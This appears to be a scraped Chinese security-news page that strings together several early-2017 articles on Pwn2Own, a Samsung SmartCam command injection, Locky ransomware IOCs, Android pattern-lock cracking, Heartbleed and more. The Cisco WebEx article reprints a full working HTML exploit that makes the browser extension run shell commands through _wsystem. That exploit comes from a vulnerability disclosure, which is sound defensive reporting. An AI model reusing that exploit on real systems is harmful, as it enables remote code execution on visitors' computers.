Ubunt系统可通过名为“AppArmor”的额外强制访问控制安全层进行保护,一些情况下可以限制本地用户权限提升漏洞利用的风险。2017年的Pwn2Own竞赛中,ZDI并未设置任何AppArmor。

在服务器端,ZDI对 Ubuntu 16.10 上运行的开源 Apache Web 服务器漏洞利用开出了20万美元的奖励。

Web浏览器

Web浏览器再次成为Pwn2Own主要目标,微软Edge浏览器或谷歌Chrome漏洞利用价值8万美元。苹果的Safari漏洞利用可获5万美元奖金。

2016的竞赛中Mozilla的火狐浏览器未能入选,但今年的目标列表中它强势回归。对火狐浏览器的成功漏洞利用可获3万美元奖励。

Mozilla增强了其安全性,我们完全有理由将其重新包含到竞赛中。

另外,2017 Pwn2Own 竞赛将为每个 Adobe Reader、微软 Office Word、Excel和PowerPoint的成功漏洞利用开出5万美元奖金。总奖金额度超过了以往任何一届Pwn2Own大赛。

戈恩茨说:“最终奖金数额的大部分取决于我们设置的项目数量,肯定会超过100万美元,是迄今为止的最大额度。”

历经十年,Pwn2Own黑客挑战赛很可能继续延续更多个年头。

“虽然生活在完全安全的世界会很美好,但我们知道这是不现实的。Pwn2Own上产生了很多伟大的研究,也激发了很多有价值的研究——最终改善了我们每个人的安全。”
如果此文章侵权,请留言,我们进行删除。0day

三星SmartCam智能摄像头曝高危命令注入漏洞,可被黑客完全控制

三星摄像头.jpg

三星SmartCam是一系列基于云端服务的安全监控摄像头,最初由Samsung Techwin研发。三星于2014年将旗下的这一部门出售给了韩华集团,并随后更名为Hanwha Techwin,但目前该司的SmartCam系列产品依旧以“三星”冠名。该系监控摄像头在智能家居产品中颇受欢迎,用户可通过网络摄像头和手机应用远程监控家庭安全,亦可作为婴儿监视器使用。

由于过去几年间该款产品的多种型号都被爆出过安全漏洞,Hanwha Techwin曾采取措施禁用了Web接口和SSH,只允许用户通过手机APP和My SmartCam云服务来使用这款产品。这次,研究人员又注意到了一个可以启用telnet和本地Web接口服务的方法。该漏洞由Exploiteers(前GTVHacker)首先发现,黑客可以借此执行远程命令注入获得root权限并完全控制此类设备。

Exploiteers研究人员在最近对型号SNH-1011的SmartCam进行测试时,注意到了尽管该设备Web接口已被禁用,但仍留有一个Web服务器以及部分与iWatch(一项网络摄像监控服务)有关的PHP脚本。其中一个脚本允许用户通过上传文件的方式更新iWatch,但由于没有很好地执行文件名检查留下了一个隐患。攻击者可以注入shell命令,由root权限的web服务器执行。

“利用iWatch Install.php的漏洞,攻击者通过构建特定文件名,放在tar命令中传递给system()调用。”研究人员在上周六的博客中解释道,

“由于web服务器以root权限运行,而文件名由用户提供,输入没有受到检查,这样就可以通过注入命令获得root权限执行远程代码。”

有意思的是,利用该漏洞可以启用已被禁用的Web接口,而该接口移除至今一直令众多用户不满。重开Web接口虽然使得用户又能通过本地网络监控摄像头画面而不必使用My SmartCam服务,但此举势必会影响到那些本已平息的陈年漏洞。

一直以来,具有漏洞的的IP摄像头都是黑客打造IoT僵尸网络的理想目标。在2014年第22届DEF CON上,Exploiteers的研究人员展示了SmartCam的部分安全漏洞。这些漏洞可引起执行任意代码,更改产品设置甚至管理员密码等问题。

第22届DEF CON上的漏洞演示部分

就在几个月前,Pen Test Partners也曾提交过关于此类产品的一系列安全问题。当时研究者注意到了型号为SNH-6410BN的IP摄像头仍留有SSH和Web服务器,给黑客提供了可能的后门。尽管这一次的漏洞是在SNH-1011中发现的,研究人员认为SmartCam整个系列的产品都会受此影响。

目前Exploiteers已经发布了此漏洞的POC(点击查看)并提供了手动修复指导方案。

本次漏洞的操作实例

*参考来源:networkworld, 由FB小编cxt编译,转载请注明来自FreeBuf.COM0day

Necurs要回来了,Locky还会远吗

Check Point公司最近发表了有关2016年12月最活跃恶意软件的报告,报告表明Locky垃圾邮件的数量在12月下降了81%。而就在10月份,Locky还占据着全球恶意软件排行榜的首位,到了12月却跌出了前十。如果你以为Locky会就此谢幕,那你就错了。

大家可能知道,Locky勒索软件的主要传播途径是Necurs僵尸网络,Locky能如此肆虐主要得益于Necurs。而圣诞节前到一月中旬的这段时间是网络罪犯们享受圣诞和新年双节的时间,在此期间,Necurs命令和控制服务器处于脱机状态,所以Locky也就只能小打小闹了。

不过思科Talos团队在几天前再次观察到一些垃圾邮件攻击开始传播Locky,只是规模较小。采用的仍是典型的脚本文件手段,但增加了一些新花样。

攻击1——双重压缩Locky

1.png

Locky攻击的电子邮件样本

这是Talos团队几天前观察到的第一个攻击。可以看到,邮件中没什么信息,主题和正文没有内容,只是一封带有附件的空白电子邮件。提取附件后其中有第二个zip文件——71344395.doc.zip,该zip文件使用双扩展名,目的是让用户误以为是doc文件。该zip文件之中是另一个双扩展名文件71344395.doc.jse。这是对应于Locky负载的恶意JavaScript。该攻击中有多个负载。

2.png

这是在终端系统上执行的JSE文件。第一个(红框内)是在网络流量中观察到的实际请求。紧接该GET请求的是看起来几乎相同的负载的两个GET请求。

3.png

恶意文件的GET请求

除上图中的红框部分外,GET请求是相同的。这样会将两个负载传播到系统——Kovter木马和Locky勒索软件。Kovter主要用于点击欺诈攻击,会在用户为解密其文件而支付后继续在系统中运行(不建议支付赎金的其中一个原因)。

攻击2——基于Rar的Locky

4.png

Locky攻击的电子邮件样本

这是Talos团队第二天开始观察到的第二个攻击。该攻击的内容稍多,主题行和正文中有内容。邮件冒充交易失败,这是垃圾邮件攻击中的惯用伎俩。该攻击使用的是rar文件,而非更常用的zip格式。用户提取文件后会发现一个js文件——doc_details.js。

5.png

恶意Javascript文件

这看起来更像我们通常观察到的Locky感染的混淆JavaScript。还有一些与该攻击有关的有意思的细节。

6.png

貌似Dridex的GET请求

其一是Locky实例的实际GET请求。如上所示,该URL结构并不是检索Locky负载通常会看到的结构,而是看起来非常像一个Dridex样本的请求。另一个独特方面与所使用的用户代理(UA)有关。下图中的数据是从网络通信中捕获的,表明使用的是python UA,而非更传统的UA。

7.png

新用户代理示例

这两次攻击的数量相对较低,但可能预示着海量攻击即将到来。

IOC

攻击1

主题:<无>

正文:<无>

哈希值:

20667ee47576765550f9961b87728128c8d9cf88861096c9715c6fce994e347e(JSE文件)

3c476dfbe53259830c458cf8b323cc9aeeb3d63d5f88cc2976716beaf24bd07c(Zip文件)

2d51e764bf37e2e8c845d980a4d324e8a1406d04a791a57e6082682ce04517db(Zip文件)

79ffaa5453500f75abe4ad196100a53dfb5ec5297fc714dd10feb26c4fb086db(Locky)

域名:

bolayde[.]com

tangopostale[.]com

攻击2

主题:交易被阻止。交易编号:<随机数>

哈希值:

0822a63725345e6b8921877367e43ee23696d75f712a9c54d5442dbc0d5f2056(JS文件)

55d092af73e5631982da6c165dfa704854b92f74eef0846e4b1aad57d0215251(Rar文件)

ec9c06a7cf810b07c342033588d2e7f5741e7acbea5f0c8e7009f6cc7087e1f7(Locky)

域名:

unwelcomeaz[.]top

结语

2016年,Locky攻击发送了数百万封恶意邮件,稳坐垃圾邮件头把交椅,它能否在2017年继续横行呢?我们就希望赚的盆满钵满的Necurs和Locky幕后黑客大佬们能继续在海滩多享受几个星期吧!

参考来源:

http://blog.talosintel.com/2017/01/locky-struggles.html

https://www.bleepingcomputer.com/news/security/locky-ransomware-activity-goes-down-by-81-percent/

http://www.informationsecuritybuzz.com/study-research/locky-ransomware-attackers-take-christmas-vacation-shows-check-point-research/

*本文作者:华为未然实验室,转载请注明来自Freebuf.COM0day

黑客能够在数秒之内破解Android手机上的解锁图形

黑客能够在数秒之内破解Android手机上的解锁图形-E安全

安全专家指出,如果大家希望保护Android手机安全,那么设置更为简单的解锁图形可能是更好的选择。

黑客能够在数秒之内破解Android手机上的解锁图形-E安全

黑客能够通过观察您的手部动作正确猜出您的解锁图形

E安全1月25日讯 目前正为无数Android用户服务的图形锁定系统看似效果出色,但根据安全专家们发布的最新结论,黑客已经能够通过观察用户手部动作而在五次尝试之内将其破解。

由中国与英国多所高校联合开展的一项研究发现,这套锁定系统并非万无一失——攻击者可以秘密拍摄用户对其手机的解锁过程,并将内容发送至计算机视觉识别程序以将手指动作同设备上的位置进行匹配。

在对120名参与者进行实际测试之后,这款软件能够在五次猜测之内实现高达95%的正确率,且整个观察过程无需面向设备屏幕。有趣的是,研究人员们还发现越是复杂的图形,其破解难度反而较简单图形更低。

图形锁定是Android智能手机与平板电脑上的一项常见功能,允许用户设置特定图形以用于解锁受到PIN码或者密码保护的设备。用户在一套网格中的多个点间设置此图形; 在随后的使用当中,用户必须输入正确的图形方可访问该设备。

黑客能够在数秒之内破解Android手机上的解锁图形 - E安全

图形锁定允许大家通过添加一组由屏幕内点连接而成的图形解锁Android手机。(兰开斯特大学)

根据兰开斯特大学、中国西北大学以及巴斯大学的研究结论,这一解锁方法并不像用户们想象的那么安全。在录制解锁过程后,计算机视觉识别软件能够基于手指的移动方向与手机相对于摄像头的位置以绘制一份可能的解锁图形列表。

研究人员们同时发现,只要“复杂度”足够高,他们甚至能够通过一次尝试即成功解锁该图形。对于高复杂度图形,其成功破解的机率高达87.5%,而简单图形的首次尝试成功机率则只有60%。

这一方案允许摄像头在相距2.5米的距离记录手机解锁过程,而使用DSLR相机则可将距离扩大至9米。与传统认为的高复杂度图形能够使设备更加安全的结论相反,研究人员解释称,由于复杂图形需要更为精确的指尖移动操作,因此该软件能够更轻松地缩小可能性范围。

此篇论文主要研究者兼合著者Zheng Wang博士指出:“图形锁定是一种非常流行的Android设备保护方案。除了锁定设备外,人们往往还会在一些重要的金融交易活动中使用复杂的图形以实现保护,例如在线银行与购物活动。然而与普遍认知中的高安全水平不同,我们的研究结果表明,利用这种图形锁定机制保护敏感信息实际上可能非常危险。”

根据研究人员们的介绍,约有40%的Android用户依赖于图形锁定机制保护自己的设备。尽管这类攻击活动可能尚不普遍,但他们仍然建议用户在进行图形解锁时注意遮挡自己的手部动作,以免被攻击者所窥探。

值得注意的是,大多数Android智能手机会在使用者输入五次以上错误PIN码、密码或者解锁图形时自动锁定。

今年1月初,日本国家信息学研究所(简称NII)即警告称,智能手机用户不应使用闪电及和平等较为常见的解锁图形。这是因为网络犯罪分子将能够借此窃取用户指纹并进行身份伪造。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

【漏洞预警】Cisco WebEx奇葩漏洞: 浏览器插件存在任意远程代码执行漏洞(含EXP)

http://p0.qhimg.com/t016a1f1a193ab1cad0.png

Cisco的WebEx extension(jlhmfgmfgeifomenelglieieghnjghma)拥有约2,000万活跃用户,并且它也是思科Webex视频会议系统重要的组成部分。

该扩展适用于包含magic模式“cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html”的任何URL,可以从扩展清单中提取。 请注意,该模式内嵌在iframe中,因此不需要用户有更多的交互,只需要访问网站就可以了。

该扩展使用nativeMessaging,所以这个magic字符串可以让任何网站执行任意代码!

这个扩展使用的协议很复杂,使用CustomEvent()对象,在Web页面中和本机代码之间传递JSON消息。

在初始化的过程中,网站使用该扩展发起请求打开一个端口进行通信,如下所示:

1
document.dispatchEvent(new?CustomEvent("connect",?{?detail:?{?token:?"token"?}}));?//?token?can?be?any?string

然后消息可以通过 “message” 事件传递到native code。 注意,这里不能是MessageEvent()对象,并且不能使用postMessage API,它们必须是CustomEvent()对象。

有几种不同的消息类型,例如“hello”,“disconnect”等。最有趣的是“launch_meeting”类型:

1
2
3
4
5
6
7
????document.dispatchEvent(new?CustomEvent("message",?{?detail:?{
????????????message:?JSON.stringify(msg),
????????????message_type:?"launch_meeting",
????????????timestamp:?(new?Date()).toUTCString(),
????????????token:?"token"
????????}
????}));

使用该扩展进行视频会议的过程中,我dump了初始化消息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
>?message.message
"{"DocshowVersion":?"1.0",
"FilterSecParameters":?"clientparam;clientparam_value",
"GpcProductRoot":?"WebEx",
"GpcMovingInSubdir":?"Wanta",
"GpcProductVersion":?"T30_MC",
"GpcUpgradeManagement":?"false",
"GpcCompatibleDesktopClients":?"",
"enableQuickLaunch":?"1",
"GpcProductDescription":?"V2ViRXg=",
"GpcUnpackName":?"atgpcdec",
"JMTSignificantFileList":?"atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog":?"1484862376664",
"GpcExtName":?"atgpcext",
"GpcUnpackVersion":?"27,?17,?2016,?501",
"GpcExtVersion":?"3015,?0,?2016,?1117",
"GpcUrlRoot":?"https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName":?"YXRtY2NsaS5ETEw=",
"GpcCompressMethod":?"7z",
"GpcActiveIniSection":?"V2ViRXhfVg==",
"GpcSupportPageUrl":?"",
"GpcIniFileName":?"Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...

有大量的属性,很多属性都有可能存在代码执行的问题,下面这些是我挑出来的一些:

1
2
3
4
5
"GpcComponentName":?"YXRtY2NsaS5ETEw=",
"GpcInitCall":?"c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZVZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==",
If?we?decode?those?strings,?we?get:
GpcComponentName:?"atmccli.DLL"
GpcInitCall:?"szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"

将这些字符串解码,如下所示:

1
2
GpcComponentName:?"atmccli.DLL"
GpcInitCall:?"szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"

这看起来像某种奇怪的脚本语言。 ‘HWND’的存在表明这是与native code交互,如果我dump atmccli.DLL的导出:

1
2
3
4
5
6
7
8
$?dumpbin?/nologo?/exports?atmccli.dll
Dump?of?file?atmccli.dll
????ordinal?hint?RVA??????name
??????????2????2?0001CC11?ExitControl
?????????24????3?0001CC83?FinishCall
??????????1????4?0001D2F9?InitControl?<--
?????????23????5?0001D556?NameValue
...

看起来像在该脚本语言中调用的函数。 是否可以在这里找一些突破口?

我注意到,他们提供一个CRT(微软的C Runtime,包含像printf,malloc等标准例程)的副本,所以我试图调用标准_wsystem()routime(像system(),除了WCHAR字符串),像这样 :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var?msg?=?{
????GpcProductRoot:?"WebEx",
????GpcMovingInSubdir:?"Wanta",
????GpcProductVersion:?"T30_MC",
????GpcUnpackName:?"atgpcdec",
????GpcExtName:?"atgpcext",
????GpcUnpackVersion:?"27,?17,?2016,?501",
????GpcExtVersion:?"3015,?0,?2016,?1117",
????GpcUrlRoot:?"http://127.0.0.1/",
????GpcComponentName:?btoa("MSVCR100.DLL"),
????GpcSuppressInstallation:?btoa("True"),
????GpcFullPage:?"True",
????GpcInitCall:?btoa("_wsystem(ExploitShellCommand);"),
????ExploitShellCommand:?btoa("calc.exe"),
}

难以置信,居然执行成功了!

完整EXP


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<html>
<head>
<title>Cisco?WebEx?Exploit</title>
<script>
var?msg?=?{
????GpcProductRoot:?"WebEx",
????GpcMovingInSubdir:?"Wanta",
????GpcProductVersion:?"T30_MC",
????GpcUnpackName:?"atgpcdec",
????GpcExtName:?"atgpcext",
????GpcUnpackVersion:?"27,?17,?2016,?501",
????GpcExtVersion:?"3015,?0,?2016,?1117",
????GpcUrlRoot:?"http://127.0.0.1/",
????GpcComponentName:?btoa("MSVCR100.DLL"),
????GpcSuppressInstallation:?btoa("True"),
????GpcFullPage:?"True",
????GpcInitCall:?btoa("_wsystem(ExploitShellCommand);"),
????ExploitShellCommand:?btoa("calc.exe"),
}
function?runcode()
{
????if?(!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html"))?{
????????alert("document?/must/?be?named?cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
????????return;
????}
????if?(!document.location.protocol.endsWith("https:"))?{
????????alert("document?/must/?be?served?over?https");
????????return;
????}
????document.dispatchEvent(new?CustomEvent("connect",?{?detail:?{?token:?"token"?}}));
????document.dispatchEvent(new?CustomEvent("message",?{?detail:?{
????????????message:?JSON.stringify(msg),
????????????message_type:?"launch_meeting",
????????????timestamp:?(new?Date()).toUTCString(),
????????????token:?"token"
????????}
????}));
}
</script>
</head>
<body?onload="runcode()">
<h1>Running?exploit...</h1>
</body>
</html>

作者上传了一个测试页面到如下地址,这个地址是安全的,没有其他非法代码执行,仅会弹出一个计算器。

https://lock.cmpxchg8b.com/ieXohz9t/

http://p5.qhimg.com/t01922b82dadb1a8906.png

如果需要测试,你仅需提供姓名、email,不需要注册即可在下面中测试:

https://www.webex.com/test-meeting.html

该漏洞超过90天漏洞公开原则期限,官方尚未提供补丁,故细节得以公开。

安全客建议


更新官方1.0.3版本:

https://chrome.google.com/webstore/detail/cisco-webex-extension/jlhmfgmfgeifomenelglieieghnjghma?hl=zh-CN

http://p2.qhimg.com/t011b00e15edfd447c9.png

但由于安全社区对该补丁的有效性尚存一定的疑虑,我们建议安装了Webex的用户,(hao)暂(hao)时(guo)禁(nian)用(bie)其(wan)浏(dian)览(nao)器(jiu)插(xing)件。

本文转载自 chromium
原文链接:https://bugs.chromium.org/p/project-zero/issues/detail?id=10960day

【电子书下载】安全客2016年刊—汇聚全年安全圈优秀技术文章

http://p3.qhimg.com/t016a15eb3946bdad58.jpg

安全客2016年刊-上册(下载请点击)

安全客2016年刊-下册(下载请点击)

安全客2016年刊


还记得那些年我们看过的《黑客档案》、《黑客防线》、《黑客手册》这些杂志吗?还记得那些从杂志里认识的ID吗?多少安全人是从这一本一本的杂志中得到了启蒙,汲取养分才成长为如今的你我。时代变迁,杂志早已不是我们获取信息的第一渠道,《黑客档案》已于2013年停刊,《黑客防线》也早已更改为电子版,但不可否认的是,它们培养了一代安全人,是中国黑客历史上的瑰宝。

http://p9.qhimg.com/t011d3135fc0e84a056.png

http://p8.qhimg.com/t01a291a65bebc975f3.jpg

杂志可以停刊,但知识的传播仍要继续。作为一家有思想的安全新媒体,安全客一直致力于传播高质量的技术文章。随着2017的到来,2016年已经悄悄划上句点,在过去的一年里,勒索软件、物联网、大数据等等关键词曾多次引发公众热议,更是安全圈内避不开的热点。我们既担忧又欣慰得发现,网络安全已不再像当年那般小众,它已经成为了当下不可忽视的议题。因此,我们为大家精选整理了这本2016年安全技术文章合辑,希望还能向过去一样,以书的形式,把技术的力量传递到更多人手中。

出于便利与环保,安全客的年刊也不再出版纸质书籍,我们为所有人提供下载链接,任何人都可以随时随地得获得2016年有关安全技术的精华。

本书共上下两册,分为Web安全、安全工具、物联网车联网安全、网络安全、移动安全、云安全、无线安全、木马分析、CTF攻略、SRC等十个方向,囊括了国内外的优质好文,荟萃了一整年的技术精华。它既是安全客的第一本年刊,也是一份送给小伙伴们的新年礼物,别人都背一本厚厚的书回家过年,我们只要点击下载,就能轻轻松松回家学习啦!

内容简介


http://p5.qhimg.com/t01088bc8e33560930d.jpg

http://p6.qhimg.com/t01bfc822c67a16aadb.jpg

致谢


成书不易,仅凭我们单方的力量无法完成这浩大的工程。安全客在此向以下为本书的文章筛选、编辑及传播作出贡献的合作平台、合作厂商、合作媒体及合作团队表示深深的感谢 。

http://p9.qhimg.com/t01f95833eca30df5f7.jpg

同时,也要感谢长期向安全客投稿的童鞋们,他们是k0shl、myswsun、Ox9A82、pwn_361、shan66、WisFree、麦香浓郁、唯一零、阻圣等等,由于篇幅有限就不一一列举了,是你们辛勤劳动的精华汇集成了此书。也希望新的一年有更多的小伙伴加入我们,大家一起携手努力,不负使命,将安全知识传递给更多的人。

新年红包


最后,小编在此悄悄告诉大家,安全客携手360SRC、滴滴SRC、i春秋、澳门金沙导航SRC、四叶草安全、唯品会SRC为小伙伴们准备了丰厚的新年礼物。大年初一至初三,一大波红包雨将不定时在安全客app降落哦!扫描最下方二维码下载app,密切关注我们吧!

http://p4.qhimg.com/t01a6f1e83ae3acbece.png

安全客2016年刊-上册(下载请点击)

安全客2016年刊-下册(下载请点击)

本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/news/detail/3948.html

0day

我们为何要花如此长的时间连上 WIFI 接入点?

腾讯、清华大学和清华大学深圳研究生院的研究人员在预印本 arXiv 上发表了一篇论文,分析了 Android/iOS 市场上的一款 WiFi 管家应用( WiFi Manager )收集的 4 个城市 500 万移动用户 700 万 WiFi 接入点的 4 亿 WiFi 会话,发现高达 45% 的连接尝试失败。而在成功连接尝试中间,15% 所花费时间超过 5 秒。超过半数的连接设置时间成本超过 15 秒,其中 47% 的时间是浪费在扫描阶段。

他们发现,除了信号强度影响连接设置程序外,WiFi 接入点的设备型号和移动设备型号都有助于预测连接时间成本。他们发现导致设备和接入点之间丢包的原因包括:信号强度变化,WiFi 干扰、高负荷导致的响应延迟。研究人员认为,可以在设备型号、接入点型号、连接接入点的设备数量、连接尝试的时间等数据的基础上开发出基于机器学习的接入点选择方法去加快连接。他们的测试显示,连接失败率从 33% 减少到 3.6%,80% 的连接设置时间成本减少到原来的十分之一。

稿源:solidot,有删改,封面来源:百度搜索0day

雅虎因数据泄露披露不及时遭美国证券交易委员会调查

知情人士透露称,美国监管机构正在调查雅虎,之前雅虎曾发生两次严重的数据泄露事故,监管机构认为雅虎应该及时向投资者汇报。

美国 SEC(证券交易委员会)已经开始调查雅虎,去年 12 月,它曾要求雅虎提供相关文档,SEC 试图搞清雅虎是否遵循民事证券法披露网络攻击一事。如果企业遭到网络攻击,一旦确定攻击会影响到投资者, SEC 要求企业及早披露。

2015 年雅虎遭到黑客攻击,5 亿用户的数据泄露,SEC的调查主要与本次攻击有关。2016 年 9 月,雅虎披露了 2014 年的攻击事故,公司认为本次攻击是国家支持的黑客发起的。既然事故是 2014 年发生的,为何当时没有披露,而是等了 2 年?没有及时向公众披露,当时做出这一决定的是谁?雅虎没有明确解释。去年 12 月中旬,雅虎声称 2013 年 8 月曾发生数据泄露事故,10 亿用户的私人信息泄露。

此前,SEC 也曾调查过几家公司,这些公司都被认为在遭遇网络攻击时对客户数据保护不力。
稿源:cnbeta,有删改,封面来源:百度搜索0day

继 BBC 之后纽约时报 Twitter 被黑发布假新闻:俄罗斯将对美进行导弹攻击

继昨日报道的 BBC 新闻 Twitter 账号被盗并发布假新闻之后,《纽约时报》也遭遇相同的事情。

当地时间周日早上 9:40 , 《纽约时报》Twitter 账户( New York Times video @ nytvideo )遭黑客入侵,并发布假新闻称:据俄罗斯总统普京泄露的消息,俄罗斯将对美国进行导弹攻击

new-york-times-hacked

这一假新闻被迅速删除,但此后黑客组织 OurMine 再次入侵、接管了社交账号并发送消息。

OurMine:我们检测到帐户有异常活动,于是我们入侵账户,以证实该帐户是否被黑客攻击。很不幸,账户确实被其他黑客入侵,该黑客使用的 IP 与此前索尼音乐被黑的 IP 相同。

new-york-times-hacked-2

虽然黑客组织 OurMine 并不是该起网络攻击的幕后黑手,但这种入侵账户“热心帮助”他人的行为还是让人难以接受。

稿源:HackerNews.cc?翻译整理,封面来源:百度搜索。
转载请注明“转自 HackerNews.cc ” 并附上原文链接,违者必究。0day

全球超过 199,500 网站仍未修复“心脏出血” OpenSSL 漏洞

Shodan 22 日一份数据报告显示目前全球仍有超过 199,500 网站仍未修复 “心脏出血” OpenSSL 漏洞,或是源于许多组织没有正确修复漏洞所致。

2014 年 4 月 7 日,开源安全组件 OpenSSL 爆出高危漏洞(CVE-2014-0160),漏洞成因是 OpenSSLHeartbeat 模块存在一个 Bug,使攻击者可以构造一个特殊的数据包获得存在该漏洞的服务器长达 64KB 的内存数据,而这段数据中可能包含用户的用户名、密码、密钥等敏感信息,因此该漏洞获得了一个名副其实的名字“心脏出血(OpenSSLHeartbleed)”漏洞。

作为互联网史上最大漏洞之一,“心脏出血”漏洞影响了全球多达三分之二服务器的安全性,据ZoomEye 2014 年监测结果显示全球约有 2,443,550 个 IP 受此漏洞影响。ZoomEye 团队在“心脏出血”漏洞爆发一周年之际,对全网 IP 进行了回归性普查发现,虽然受影响 IP 已经降低到了 1 年前的 14.6%,但还有较大量(377,221)的 IP 漏洞并未修复。

然而 Shadow 最新报告却表明,距漏洞爆发至今已过去两年零九个月,仍有几十万网站漏洞未被修复。

超过 199,500 网站易受攻击

Shodan 首席执行官 John Matherly 表示,由于未正确修复“心脏出血”漏洞,全球还有超过 199,500 个网站容易受到黑客攻击。报告指出目前受影响最大的国家仍是美国(41,332),其次是韩国(15,380)、中国(14,116)、德国(14,072)以及法国、俄罗斯等。可以想象若是近二十万网站漏洞都被利用,势必会造成更大规模的数据泄露事件。

如何正确修复心脏出血漏洞

修复“心脏出血”漏洞至少需要三个步骤:
① 及时更新:更新 OpenSSL 至最新版本,目前大部分机构都已完成了这一步;
② 创建新密钥:防止攻击者已通过漏洞窃取服务器密钥,或是进一步窃取机密数据;
③ 补发安全证书:防止攻击者继续利用漏洞损害公司或客户权益。

稿源:HackerNews.cc?翻译/整理,封面来源:百度搜索。
转载请注明“转自 HackerNews.cc ” 并附上原文链接,违者必究。0day

澳拟试用新入境系统,将以生物识别技术替代检查护照

据香港《文汇报》 23 日报道,澳大利亚当地移民及边境保护局计划今年试用“免人手处理”的新入境系统,于机场设立电子扫描站,利用生物识别技术辨认入境游客的面孔、眼睛虹膜及指纹,取代传统出示护照的入境程序。

